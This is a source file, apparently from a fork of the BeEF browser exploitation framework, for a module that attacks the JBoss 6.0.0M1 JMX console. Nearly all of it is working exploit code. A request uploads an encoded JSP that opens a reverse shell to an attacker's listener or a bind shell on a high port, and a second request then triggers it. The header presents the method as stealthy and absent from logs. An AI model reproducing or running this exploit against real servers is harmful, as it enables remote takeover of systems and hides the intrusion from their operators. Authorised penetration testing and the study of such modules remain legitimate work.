PageRenderTime 27ms CodeModel.GetById 15ms RepoModel.GetById 0ms app.codeStats 0ms

/modules/network/jboss_jmx_upload_exploit/command.js

https://github.com/asaafan/BeEF
JavaScript | 67 lines | 37 code | 5 blank | 25 comment | 8 complexity | feab355b14b56a61242f5490eed67f87 MD5 | raw file
    

  1. //
    2. 

  2. //   Copyright 2011 Wade Alcorn wade@bindshell.net
    3. 

  3. //
    4. 

  4. //   Licensed under the Apache License, Version 2.0 (the "License");
    5. 

  5. //   you may not use this file except in compliance with the License.
    6. 

  6. //   You may obtain a copy of the License at
    7. 

  7. //
    8. 

  8. //       http://www.apache.org/licenses/LICENSE-2.0
    9. 

  9. //
    10. 

  10. //   Unless required by applicable law or agreed to in writing, software
    11. 

  11. //   distributed under the License is distributed on an "AS IS" BASIS,
    12. 

  12. //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
    13. 

  13. //   See the License for the specific language governing permissions and
    14. 

  14. //   limitations under the License.
    15. 

  15. //
    16. 

  16. /**
    17. 

  17.  * Jboss 6.0.0M1 JMX Upload Exploit
    18. 

  18.  * Ported from l33tb0y Ruby code in Javascript by antisnatchor.
    19. 

  19.  * HEAD request with malicious JSP -> sleep 10 secs -> GET request to deployed JSP -> reverse connection to listening MSF handler OR shell binding to high port
    20. 

  20.  *
    21. 

  21.  * This is a variation of the JBOSS exploits of Metasploit: instead of deploying a WAR, directly deploy a JSP reverse shell.
    22. 

  22.  * This is the stealthiest approach: nothing is shown on the logs
    23. 

  23.  */
    24. 

  24. beef.execute(function() {
    25. 

  25. 

  26.    rhost = "<%= @rhost %>";
    27. 

  27.    rport = "<%= @rport %>";
    28. 

  28.    lhost = "<%= @lhost %>";
    29. 

  29.    lport = "<%= @lport %>";
    30. 

  30.    injectedCommand = "<%= @injectedCommand %>";
    31. 

  31.    jspName = "<%= @jspName %>";
    32. 

  32.    payloadType = "<%= @payload %>";
    33. 

  33. 

  34.    reverse = "try%20%7B%20Socket%20socket%20=%20new%20Socket(%20%22" + lhost + "%22,%20" + lport + "%20);%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + injectedCommand + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20";
    35. 

  35.    bind = "try%20%7B%20ServerSocket%20server_socket%20=%20new%20ServerSocket(%20" + lport + "%20);%20Socket%20socket%20=%20server_socket.accept();%20server_socket.close();%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + injectedCommand + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20";
    36. 

  36. 

  37.    if(payloadType == "reverse"){
    38. 

  38.        payload = "%3C%25@page%20import=%22java.lang.*%22%25%3E%20%3C%25@page%20import=%22java.util.*%22%25%3E%20%3C%25@page%20import=%22java.io.*%22%25%3E%20%3C%25@page%20import=%22java.net.*%22%25%3E%20%3C%25%20class%20StreamConnector%20extends%20Thread%20%7B%20InputStream%20is;%20OutputStream%20os;%20StreamConnector(%20InputStream%20is,%20OutputStream%20os%20)%20%7B%20this.is%20=%20is;%20this.os%20=%20os;%20%7D%20public%20void%20run()%20%7B%20BufferedReader%20in%20%20=%20null;%20BufferedWriter%20out%20=%20null;%20try%20%7B%20in%20%20=%20new%20BufferedReader(%20new%20InputStreamReader(%20this.is%20)%20);%20out%20=%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.os%20)%20);%20char%20buffer[]%20=%20new%20char[8192];%20int%20length;%20while(%20(%20length%20=%20in.read(%20buffer,%200,%20buffer.length%20)%20)%20%3E%200%20)%20%7B%20out.write(%20buffer,%200,%20length%20);%20out.flush();%20%7D%20%7D%20catch(%20Exception%20e%20)%7B%7D%20try%20%7B%20if(%20in%20!=%20null%20)%20in.close();%20if(%20out%20!=%20null%20)%20out.close();%20%7D%20catch(%20Exception%20e%20)%7B%7D%20%7D%20%7D%20" + reverse + "%25%3E";
    39. 

  39.    }else{
    40. 

  40.        payload = "%3C%25@page%20import=%22java.lang.*%22%25%3E%20%3C%25@page%20import=%22java.util.*%22%25%3E%20%3C%25@page%20import=%22java.io.*%22%25%3E%20%3C%25@page%20import=%22java.net.*%22%25%3E%20%3C%25%20class%20StreamConnector%20extends%20Thread%20%7B%20InputStream%20is;%20OutputStream%20os;%20StreamConnector(%20InputStream%20is,%20OutputStream%20os%20)%20%7B%20this.is%20=%20is;%20this.os%20=%20os;%20%7D%20public%20void%20run()%20%7B%20BufferedReader%20in%20%20=%20null;%20BufferedWriter%20out%20=%20null;%20try%20%7B%20in%20%20=%20new%20BufferedReader(%20new%20InputStreamReader(%20this.is%20)%20);%20out%20=%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.os%20)%20);%20char%20buffer[]%20=%20new%20char[8192];%20int%20length;%20while(%20(%20length%20=%20in.read(%20buffer,%200,%20buffer.length%20)%20)%20%3E%200%20)%20%7B%20out.write(%20buffer,%200,%20length%20);%20out.flush();%20%7D%20%7D%20catch(%20Exception%20e%20)%7B%7D%20try%20%7B%20if(%20in%20!=%20null%20)%20in.close();%20if(%20out%20!=%20null%20)%20out.close();%20%7D%20catch(%20Exception%20e%20)%7B%7D%20%7D%20%7D%20" + bind + "%25%3E";
    41. 

  41.    }
    42. 

  42. 

  43.     uri = "/jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=%2Fconsole-mgr.sar/web-console.war%2F&arg1=" + jspName + "&arg2=.jsp&arg3=" + payload + "&arg4=True";
    44. 

  44. 

  45.     /* always use dataType: script when doing cross-domain XHR, otherwise even if the HTTP resp is 200, jQuery.ajax will always launch the error() event*/
    46. 

  46. 	beef.net.request("http", "HEAD", rhost, rport, uri,null, null, 10, 'script', function(response){
    47. 

  47.          if(response.status_code == "success"){
    48. 

  48.              function triggerReverseConn(){
    49. 

  49.                 beef.net.request("http", "GET", rhost, rport,"/web-console/" + jspName + ".jsp", null, null, 10, 'script', function(response){
    50. 

  50.                     if(response.status_code == "success"){
    51. 

  51.                          if(payloadType == "reverse"){
    52. 

  52.                              beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse JSP shell should have been triggered. Check your MSF handler listener.");
    53. 

  53.                          }else{
    54. 

  54.                             beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Bind JSP shell should have been triggered. Try to connect to "+rhost+":"+lport+".");
    55. 

  55.                          }
    56. 

  56.                     }else{
    57. 

  57.                         beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: second GET request failed.");
    58. 

  58.                     }
    59. 

  59.                 });
    60. 

  60.              }
    61. 

  61.             // give the time to JBoss to deploy the JSP reverse shell
    62. 

  62.             setTimeout(triggerReverseConn,10000);
    63. 

  63.          }else{
    64. 

  64.              beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: first HEAD request failed.");
    65. 

  65.          }
    66. 

  66.     });
    67. 

  67. });
    68.